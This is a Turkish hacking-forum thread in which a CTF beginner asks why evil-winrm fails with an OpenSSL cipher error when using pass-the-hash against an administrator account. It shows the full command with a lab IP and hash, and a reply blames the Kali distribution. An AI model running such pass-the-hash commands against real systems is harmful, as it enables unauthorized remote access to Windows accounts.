Evil-winrm Hash ile bağlantıda sorun yaşıyorum

c3a9a

Yeni üye
30 Nis 2022
1
0
Arkadaşlar yeni yeni ctf çözmeye başladım evil-winrm aracıyla hash kullanarak bi ad admin hesabına sızmaya çalışıyorum ama böyle bir hata veriyor internette de pek birşey bulamadım yardımcı olursanız sevinirim.

└─# evil-winrm -i 10.10.113.221 -u administrator -H 0e0363213e37b94221497260b0bcb4
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

Error: An error of type OpenSSL::Cipher::CipherError happened, message is unsupported
Error: Exiting with code 1

heredotcan

Katılımcı Üye
28 Ağu 2008
675
148
Dostum elindeki Distroda Sıkıntı var nedenini bilmiyorum ama sıfır bir kalide deneyince sorun çözülüyor benimde başıma geldi

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.